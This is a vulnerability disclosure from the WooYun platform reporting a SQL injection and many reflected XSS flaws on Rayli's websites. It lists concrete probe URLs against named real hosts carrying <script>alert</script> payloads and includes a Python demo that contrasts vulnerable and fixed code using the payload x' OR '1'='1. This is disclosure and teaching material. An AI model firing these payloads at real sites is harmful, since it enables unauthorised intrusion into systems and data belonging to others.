
Vulnerability summary

Defect ID: wooyun-2012-015481

Title: SQL injection in Rayli's mobile site, plus several XSS

Affected vendor: 瑞丽网 (Rayli)

Reporter: 黄小昏

Submitted: 2012-12-01 17:15

Fix deadline: 2013-01-15 17:16

Disclosed: 2013-01-15 17:16

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2012-12-01: Vendor contacted, awaiting vendor acknowledgement; details withheld from the public
2013-01-15: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Rayli's mobile site has a SQL injection, and several parameters across rayli.com.cn reflect unescaped input (XSS).

Details:

SQL injection in the mobile article search endpoint (parameters ver and tag; the tag value below is URL-encoded 搭配):

http://58.68.226.230/article/search.php?ver=iphone&tag=%E6%90%AD%E9%85%8D

[screenshot: 1.png]


Several XSS. Each URL below carries the probe '"><script>alert(n);</script><" in a single parameter: tryid on /tryapply/, csid on /products/show/, and tag on the 3g.rayli.com.cn search script.
http://hzp.rayli.com.cn/tryapply/?tryid='"><script>alert(4828051);</script><"
http://hzp.rayli.com.cn/products/show/33880?score[27]=&score[20]=&score[7]=&score[35]=&pf_ycall=&ptypecode=010402&pid=33880&bid=549&issubprice=0&csid='"><script>alert(6484834);</script><"
http://hzp.rayli.com.cn/products/show/36104?score[25]=&score[27]=&score[7]=&score[11]=&score[26]=&pf_ycall=&ptypecode=010501&pid=36104&bid=707&issubprice=0&csid='"><script>alert(0555687);</script><"
http://3g.rayli.com.cn/article/search.php?ver=iphone&tag='"><script>alert(3870586);</script><"
http://hzp.rayli.com.cn/products/show/32817?score[50]=&score[51]=&score[52]=&score[7]=&score[1]=&pf_ycall=&ptypecode=010602&pid=32817&bid=718&issubprice=0&csid='"><script>alert(8194777);</script><"
http://hzp.rayli.com.cn/products/show/37269?score[2]=&score[6]=&score[5]=&score[4]=&score[1]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010107&pid=37269&bid=671&issubprice=0&csid='"><script>alert(8709470);</script><"
http://hzp.rayli.com.cn/products/show/9155?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=9155&bid=694&issubprice=0&csid='"><script>alert(7228560);</script><"
http://hzp.rayli.com.cn/products/show/33629?score[38]=&score[36]=&score[37]=&score[7]=&pf_ycall=&ptypecode=010120&pid=33629&bid=788&issubprice=0&csid='"><script>alert(9867271);</script><"
http://hzp.rayli.com.cn/products/show/34713?score[6]=&score[4]=&score[2]=&score[5]=&score[1]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010108&pid=34713&bid=1216&issubprice=0&csid='"><script>alert(3928682);</script><"
http://hzp.rayli.com.cn/products/show/31930?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=31930&bid=836&issubprice=0&csid='"><script>alert(5182876);</script><"
http://hzp.rayli.com.cn/products/show/34968?score[4]=&score[5]=&score[6]=&score[2]=&score[3]=&score[1]=&score[7]=&pf_ycall=&ptypecode=010115&pid=34968&bid=1216&issubprice=0&csid='"><script>alert(8396796);</script><"
http://hzp.rayli.com.cn/products/show/34995?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=34995&bid=487&issubprice=0&csid='"><script>alert(4617969);</script><"
http://hzp.rayli.com.cn/products/show/33212?score[38]=&score[51]=&score[15]=&score[14]=&score[7]=&pf_ycall=&ptypecode=010118&pid=33212&bid=612&issubprice=0&csid='"><script>alert(0983381);</script><"
http://hzp.rayli.com.cn/products/show/34363?score[25]=&score[27]=&score[7]=&score[11]=&score[26]=&pf_ycall=&ptypecode=010501&pid=34363&bid=597&issubprice=0&csid='"><script>alert(0983381);</script><"
http://hzp.rayli.com.cn/products/show/33527?score[19]=&score[5]=&score[27]=&score[7]=&score[11]=&score[28]=&pf_ycall=&ptypecode=010503&pid=33527&bid=489&issubprice=0&csid='"><script>alert(0692564);</script><"
http://hzp.rayli.com.cn/products/show/33828?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=33828&bid=691&issubprice=0&csid='"><script>alert(4408438);</script><"
http://hzp.rayli.com.cn/products/show/14787?score[39]=&score[4]=&score[6]=&score[1]=&score[40]=&score[7]=&pf_ycall=&ptypecode=010112&pid=14787&bid=811&issubprice=0&csid='"><script>alert(6908941);</script><"
http://hzp.rayli.com.cn/tryapply/?tryid='"><script>alert(9033611);</script><"
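The two defects reported above (an unquoted tag value reaching SQL, and tryid/csid echoed into HTML unescaped), each reproduced next to its hardened form. This is an added example and not code from the report or from rayli.com.cn: the SQLite table, its column names and sample rows are constructed here, and the assumption that search.php splices tag into the query text is ours, made only because the report says the input is unfiltered. probe_params() is a small helper for a retest: given one of the listed URLs it names the parameter that carries the <script> probe.

```python
"""Added example: the reported SQL injection and XSS, vulnerable and hardened,
run against an in-memory SQLite table and a toy HTML template. Schema and rows
are constructed; rayli.com.cn's real backend is unknown."""
import html
import sqlite3
from urllib.parse import urlsplit, parse_qs

# The probe the report appends to tryid= / csid= / tag=; the number is arbitrary.
XSS_PROBE = '\'"><script>alert(1);</script><"'


def make_db():
    """Constructed sample table standing in for the article search backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, tag TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, tag) VALUES (?, ?)",
        [("Spring layering", "搭配"), ("Red lip guide", "彩妆"), ("Denim picks", "搭配")],
    )
    return conn


def search_concat(conn, tag):
    """Vulnerable (assumed shape of search.php): tag is spliced into the SQL text,
    so a single quote closes the literal and the rest of the value becomes SQL."""
    return conn.execute(f"SELECT id FROM articles WHERE tag = '{tag}'").fetchall()


def search_param(conn, tag):
    """Hardened: same query, tag bound as a parameter; quotes in it are plain data."""
    return conn.execute("SELECT id FROM articles WHERE tag = ?", (tag,)).fetchall()


def render_unsafe(csid):
    """Vulnerable: csid echoed straight into an attribute, as the probe URLs show."""
    return f'<input type="hidden" name="csid" value="{csid}">'


def render_safe(csid):
    """Hardened: HTML-escape before echoing; quote=True also neutralises ' and "
    so the value cannot break out of the attribute."""
    return f'<input type="hidden" name="csid" value="{html.escape(csid, quote=True)}">'


def probe_params(url):
    """Return the query parameters of a reported URL whose value carries a
    <script> probe, so a retest knows which field to watch in the response."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(k for k, vs in qs.items() if any("<script>" in v.lower() for v in vs))


if __name__ == "__main__":
    db = make_db()
    print(search_concat(db, "搭配"))           # the two 搭配 rows
    print(search_concat(db, "x' OR '1'='1"))  # every row: the quote closed the literal
    print(search_param(db, "x' OR '1'='1"))   # []: the payload is just an unknown tag
    print(render_unsafe(XSS_PROBE))           # live <script> element in the page
    print(render_safe(XSS_PROBE))             # entities only, attribute intact
    print(probe_params("http://hzp.rayli.com.cn/tryapply/?tryid=" + XSS_PROBE))
```

A single quote on its own makes search_concat raise a SQL syntax error while search_param simply returns no rows; that difference in behaviour is the quickest check for whether the fix actually landed on the tag parameter.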

Proof of vulnerability:

As above: neither the SQL input nor the reflected parameters are filtered.

Suggested fix:

You have plenty of experts; they should know how to filter input. Concretely, bind the tag value as a query parameter instead of concatenating it into the SQL, and HTML-encode tryid, csid and tag before echoing them into the page.

Copyright notice: reproduction must credit the source, 黄小昏@乌云


Vendor response

Vendor response:

Vendor could not be reached, or the vendor actively refused to respond